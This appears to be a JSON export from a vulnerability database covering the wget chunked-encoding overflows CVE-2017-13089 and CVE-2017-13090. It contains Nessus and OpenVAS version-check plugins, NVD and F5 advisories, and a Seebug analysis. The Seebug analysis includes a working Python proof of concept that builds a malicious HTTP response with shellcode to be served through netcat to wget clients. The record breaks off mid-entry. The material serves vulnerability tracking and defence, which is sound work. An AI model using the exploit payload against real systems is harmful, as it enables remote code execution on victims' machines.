os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "title": "Fedora 26 : wget (2017-f0b3231763)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-02-04T11:06:06"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb"}, {"key": "cvelist", "hash": "d20ef5c4d89f5885abcc7f2eab461c9c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "a0e9f1cac5ee28958e21cdbbfc6ea938"}, {"key": "href", "hash": "c09912b70625e497f66d769f2bb6ba80"}, {"key": "modified", "hash": "e5ea4e133fdd22d0dad25dd00662de7f"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "7f9bdd2b409c9bc14cc0b2cca6553247"}, {"key": "published", "hash": "3dac0ffc80a5d37a95ccdf97e777628f"}, {"key": "references", "hash": "ada99a85a22bbcb4af166b40440e0a4c"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "0c49659962d34669cce2ef13d33180d4"}, {"key": "title", "hash": "c5813c86deb437665ba4de345462cb8b"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "5ac666295948bc464a281d1c9724a1f41f533a151af80e2abddfa2fa4a6cd6fd", "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.3 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:59:06 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "104452", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"]}

{"cve": [{"lastseen": "2017-12-30T11:50:05", "references": ["http://www.securityfocus.com/bid/101590", "https://security.gentoo.org/glsa/201711-06", "http://git.savannah.gnu.org/cgit/wget.git/commit/?id=ba6b44f6745b14dce414761a8e4b35d31b176bba", "http://www.securitytracker.com/id/1039661", "https://www.viestintavirasto.fi/en/cybersecurity/vulnerabilities/2017/haavoittuvuus-2017-037.html", "http://www.debian.org/security/2017/dsa-4008", "https://www.synology.com/support/security/Synology_SA_17_62_Wget", "https://access.redhat.com/errata/RHSA-2017:3075"], "description": "The retr.c:fd_read_body() function is called when processing OK responses. When the response is sent chunked in wget before 1.19.2, the chunk parser uses strtol() to read each chunk's length, but doesn't check that the chunk length is a non-negative number. The code then tries to read the chunk in pieces of 8192 bytes by using the MIN() macro, but ends up passing the negative chunk length to retr.c:fd_read(). As fd_read() takes an int argument, the high 32 bits of the chunk length are discarded, leaving fd_read() with a completely attacker controlled length argument. The attacker can corrupt malloc metadata after the allocated buffer.", "edition": 7, "reporter": "NVD", "published": "2017-10-27T15:29:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "cve", "title": "CVE-2017-13090", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-13090"], "scanner": [], "modified": "2017-12-29T21:29:01", "cpe": ["cpe:/a:gnu:wget:1.19.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13090", "id": "CVE-2017-13090", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-30T11:50:05", "references": ["http://www.securityfocus.com/bid/101592", "http://git.savannah.gnu.org/cgit/wget.git/commit/?id=d892291fb8ace4c3b734ea5125770989c215df3f", "https://security.gentoo.org/glsa/201711-06", "http://www.securitytracker.com/id/1039661", "https://www.viestintavirasto.fi/en/cybersecurity/vulnerabilities/2017/haavoittuvuus-2017-037.html", "https://github.com/r1b/CVE-2017-13089", "http://www.debian.org/security/2017/dsa-4008", "https://www.synology.com/support/security/Synology_SA_17_62_Wget", "https://access.redhat.com/errata/RHSA-2017:3075"], "description": "The http.c:skip_short_body() function is called in some circumstances, such as when processing redirects. When the response is sent chunked in wget before 1.19.2, the chunk parser uses strtol() to read each chunk's length, but doesn't check that the chunk length is a non-negative number. The code then tries to skip the chunk in pieces of 512 bytes by using the MIN() macro, but ends up passing the negative chunk length to connect.c:fd_read(). As fd_read() takes an int argument, the high 32 bits of the chunk length are discarded, leaving fd_read() with a completely attacker controlled length argument.", "edition": 7, "reporter": "NVD", "published": "2017-10-27T15:29:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "cve", "title": "CVE-2017-13089", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-13089"], "scanner": [], "modified": "2017-12-29T21:29:01", "cpe": ["cpe:/a:gnu:wget:1.19.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13089", "id": "CVE-2017-13089", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2017-11-29T23:03:49", "references": [], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "reporter": "f5", "published": "2017-11-29T19:09:00", "type": "f5", "title": "Wget vulnerability CVE-2017-13090", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2017-13090"], "modified": "2017-11-29T21:27:00", "href": "https://support.f5.com/csp/article/K13288506", "id": "F5:K13288506", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-08T02:55:37", "references": [], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "reporter": "f5", "published": "2017-11-29T21:12:00", "type": "f5", "title": "Wget vulnerability CVE-2017-13089", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2017-13089"], "modified": "2018-02-08T02:43:00", "href": "https://support.f5.com/csp/article/K46552732", "id": "F5:K46552732", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:04:37", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "That\u2019s an interesting vulnerability in GNU wget. According to the wget project, this was reported by Antti Levom\u00e4ki, Christian Jalio, Joonas Pihlaja of Forcepoint as well as Juhani Eronen of the Finnish National Cyber Security Centre. The vulnerability is in src/http.c source code file and more precisely in skip_short_body() function.\r\n\r\n```\r\n/* Read the body of the request, but don't store it anywhere and don't\r\n display a progress gauge. This is useful for reading the bodies of\r\n administrative responses to which we will soon issue another\r\n request. The response is not useful to the user, but reading it\r\n allows us to continue using the same connection to the server.\r\n \r\n If reading fails, false is returned, true otherwise. In debug\r\n mode, the body is displayed for debugging purposes. */\r\n \r\nstatic bool\r\nskip_short_body (int fd, wgint contlen, bool chunked)\r\n{\r\n enum {\r\n SKIP_SIZE = 512, /* size of the download buffer */\r\n SKIP_THRESHOLD = 4096 /* the largest size we read */\r\n };\r\n wgint remaining_chunk_size = 0;\r\n ...\r\n return true;\r\n}\r\n```\r\n\r\nThe description in the comment is pretty clear but what we care about here is the \u201cremaining_chunk_size\u201d variable which has data type of \u201cwgint\u201d. This is a data type defined in src/wget.h header file based on the architecture and operating system.\r\n```\r\n/* Pick an integer type large enough for file sizes, content lengths,\r\n and such. Because today's files can be very large, it should be a\r\n signed integer at least 64 bits wide. This can't be typedeffed to\r\n off_t because: a) off_t is always 32-bit on Windows, and b) we\r\n don't necessarily want to tie having a 64-bit type for internal\r\n calculations to having LFS support. */\r\n \r\n#ifdef WINDOWS\r\n /* nothing to do, see mswindows.h */\r\n#elif SIZEOF_LONG >= 8\r\n /* long is large enough, so use it. */\r\n typedef long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG\r\n#elif SIZEOF_LONG_LONG >= 8\r\n /* long long is large enough and available, use that */\r\n typedef long long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG_LONG\r\n#elif HAVE_INT64_T\r\n typedef int64_t wgint;\r\n# define SIZEOF_WGINT 8\r\n#elif SIZEOF_OFF_T >= 8\r\n /* In case off_t is typedeffed to a large non-standard type that our\r\n tests don't find. */\r\n typedef off_t wgint;\r\n# define SIZEOF_WGINT SIZEOF_OFF_T\r\n#else\r\n /* Fall back to using long, which is always available and in most\r\n cases large enough. */\r\n typedef long wgint;\r\n# define SIZEOF_WGINT SIZEOF_LONG\r\n#endif\r\n```\r\n\r\nWhat is worth noting is all of the type definitions are using signed data types. This means that \u201cwgint\u201d variables can get both positive and negative values. Now that this is clear, let\u2019s move back to http.c and skip_short_body() function.\r\n```\r\nstatic bool\r\nskip_short_body (int fd, wgint contlen, bool chunked)\r\n{\r\n ...\r\n SKIP_SIZE = 512, /* size of the download buffer */\r\n ...\r\n wgint remaining_chunk_size = 0;\r\n char dlbuf[SKIP_SIZE + 1];\r\n ...\r\n while (contlen > 0 || chunked)\r\n {\r\n int ret;\r\n if (chunked)\r\n {\r\n if (remaining_chunk_size == 0)\r\n {\r\n char *line = fd_read_line (fd);\r\n char *endl;\r\n if (line == NULL)\r\n break;\r\n \r\n remaining_chunk_size = strtol (line, &endl, 16);\r\n xfree (line);\r\n ...\r\n contlen = MIN (remaining_chunk_size, SKIP_SIZE);\r\n ...\r\n ret = fd_read (fd, dlbuf, MIN (contlen, SKIP_SIZE), -1);\r\n ...\r\n}\r\n```\r\n\r\nSo, when wget processes chunked responses it will enter this \u201cwhile\u201d loop (content length greater than zero or the response is chunked). When the chunk size gets to 0, it will read the next line using fd_read_line() and then attempt to retrieve the remaining chunk size using strtol() in hexadecimal. This value is 100% controlled by the response header and it could be anything, including so large that it will wrap around this signed integer into a negative value. Then MIN() macro will be used to compare that value with SKIP_SIZE (which is 512) and use this to initialize \u201ccontlen\u201d signed integer. If \u201cremaining_chunk_size\u201d had a negative value it means that this will now be stored in \u201ccontlen\u201d which is then used in fd_read() leading to a stack based buffer overflow as the attacker completely controls the size argument that is used to copy data from \u201cfd\u201d (the HTTP page) to \u201cdlbuf\u201d (stack based buffer with size of 513 bytes). The fix was relatively simple as you can see below.\r\n```\r\n remaining_chunk_size = strtol (line, &endl, 16);\r\n xfree (line);\r\n \r\n+ if (remaining_chunk_size < 0)\r\n+ return false;\r\n+\r\n if (remaining_chunk_size == 0)\r\n```\r\n\r\nThe fix was a simple bound check after the strtol() call to ensure that the value of \u201cremaining_chunk_size\u201d was not set to a negative value before continuing with the processing.", "reporter": "Root", "published": "2017-11-13T00:00:00", "type": "seebug", "title": "wget HTTP integer overflow(CVE-2017-13089)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13089"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96839", "id": "SSV:96839", "sourceData": "\n # coding=utf-8\r\n# author : k2yk\r\n\r\n# usage python shellcode.py&nc -lp 80 < payload\r\n\r\nPayload = \"\"\"HTTP/1.1 401 Not Authorized\r\nContent-Type: text/plain; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n\r\n-0xFFFFFD00\r\n\"\"\"\r\nbuf = \"\"\r\nbuf += \"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xfa\\xff\\xff\\xff\\x48\\x8d\\x05\"\r\nbuf += \"\\xef\\xff\\xff\\xff\\x48\\xbb\\xc5\\xb5\\xcb\\x60\\x1e\\xba\\xb2\"\r\nbuf += \"\\x1b\\x48\\x31\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\"\r\nbuf += \"\\xaf\\x8e\\x93\\xf9\\x56\\x01\\x9d\\x79\\xac\\xdb\\xe4\\x13\\x76\"\r\nbuf += \"\\xba\\xe1\\x53\\x4c\\x52\\xa3\\x4d\\x7d\\xba\\xb2\\x53\\x4c\\x53\"\r\nbuf += \"\\x99\\x88\\x16\\xba\\xb2\\x1b\\xea\\xd7\\xa2\\x0e\\x31\\xc9\\xda\"\r\nbuf += \"\\x1b\\x93\\xe2\\x83\\xe9\\xf8\\xb5\\xb7\\x1b\"\r\n\r\nPayload += buf+(568-len(buf))*\"A\"\r\nPayload += \"\\xdd\\xdd\\xff\\xff\\xff\\x7f\\x00\\x00\" #SHELLCODE \u8d77\u59cb\u5730\u5740 \u5982\u65e0\u610f\u5916\u9700\u81ea\u5df1\u624b\u52a8\u5b9a\u4f4d\r\nPayload += \"\\n0\\n\"\r\n\r\n\r\n\r\nwith open('payload','wb') as filePayload:\r\n filePayload.write(Payload)\r\n filePayload.flush()\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96839", "status": "cve,poc,details"}], "openvas": [{"lastseen": "2018-09-01T23:45:06", "references": ["https://www.debian.org/security/2017/dsa-4008.html"], "pluginID": "1361412562310704008", "description": "Antti Levomaeki, Christian Jalio, Joonas Pihlaja and Juhani Eronen\ndiscovered two buffer overflows in the HTTP protocol handler of the Wget\ndownload tool, which could result in the execution of arbitrary code\nwhen connecting to a malicious HTTP server.", "edition": 5, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net", "published": "2017-10-28T00:00:00", "title": "Debian Security Advisory DSA 4008-1 (wget - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310704008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_4008.nasl 7859 2017-11-22 09:05:55Z asteins $\n#\n# Auto-generated from advisory DSA 4008-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704008\");\n script_version(\"$Revision: 7859 $\");\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_name(\"Debian Security Advisory DSA 4008-1 (wget - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-22 10:05:55 +0100 (Wed, 22 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-28 00:00:00 +0200 (Sat, 28 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4008.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name:\"affected\", value:\"wget on Debian Linux\");\n script_tag(name:\"insight\", value:\"Wget is a network utility to retrieve files from the web\nusing HTTP(S) and FTP, the two most widely used internet\nprotocols. It works non-interactively, so it will work in\nthe background, after having logged off. The program supports\nrecursive retrieval of web-authoring pages as well as FTP\nsites -- you can use Wget to make mirrors of archives and\nhome pages or to travel the web like a WWW robot.\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 1.16-1+deb8u4.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.18-5+deb9u1.\n\nWe recommend that you upgrade your wget packages.\");\n script_tag(name:\"summary\", value:\"Antti Levomaeki, Christian Jalio, Joonas Pihlaja and Juhani Eronen\ndiscovered two buffer overflows in the HTTP protocol handler of the Wget\ndownload tool, which could result in the execution of arbitrary code\nwhen connecting to a malicious HTTP server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.18-5+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.16-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:41", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JJKUFQV66VAXA6TWDXP2AO7IOUWYIEPM", "2017-10fbce01ec"], "pluginID": "1361412562310873726", "description": "Check the version of wget", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-23T00:00:00", "title": "Fedora Update for wget FEDORA-2017-10fbce01ec", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", 